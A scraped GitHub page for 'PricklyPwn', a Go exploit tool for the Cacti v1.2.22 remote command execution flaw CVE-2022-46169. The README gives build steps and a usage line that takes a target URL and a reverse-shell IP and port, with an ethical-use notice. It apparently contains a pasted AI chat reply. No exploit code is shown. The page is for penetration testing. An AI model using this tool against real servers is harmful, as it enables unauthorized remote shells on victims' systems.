Skip to content

An advanced RCE tool tailored for exploiting a vulnerability in Cacti v1.2.22. Crafted with precision, this utility aids security researchers in analyzing and understanding the depth of the CVE-2022-46169 flaw. Use responsibly and ethically.

copyleftdev/PricklyPwn

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Sure! Here's a "dope" README.md for your PricklyPwn project:


🌵 PricklyPwn 🌵

Banner

Penetrate with precision. A Remote Command Execution Exploit for Cacti v1.2.22.


Table of Contents

  1. Description
  2. Installation
  3. Usage
  4. Ethical Notice

Description

PricklyPwn is a sleek, high-performance tool crafted in Go, designed to exploit the Remote Command Execution (RCE) vulnerability found in Cacti versions up to v1.2.22. Built for security enthusiasts, ethical hackers, and defenders, it assists in comprehending and remediating the CVE-2022-46169 vulnerability.


Installation

# Clone this repository
git clone https://github.com/your_username/PricklyPwn.git

# Navigate to the PricklyPwn directory
cd PricklyPwn

# Build the Go binary
go build -o PricklyPwn main.go

Usage

# Basic usage
./PricklyPwn -url <target_url> -remote_ip <reverse_shell_ip> -remote_port <reverse_shell_port>

For more advanced options, refer to the documentation.


🚨 Ethical Notice 🚨

This tool is strictly intended for educational and legal, authorized penetration testing purposes. Always get explicit permission before attempting any kind of testing. Unauthorized hacking is illegal and unethical. The PricklyPwn team cannot and will not bear responsibility for misuse.


Acknowledgments

  • Thanks to all security researchers who continuously push the boundaries and inspire tools like this.
  • Special shoutout to the Cacti team for their commitment to making the internet a safer place.

About

An advanced RCE tool tailored for exploiting a vulnerability in Cacti v1.2.22. Crafted with precision, this utility aids security researchers in analyzing and understanding the depth of the CVE-2022-46169 flaw. Use responsibly and ethically.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages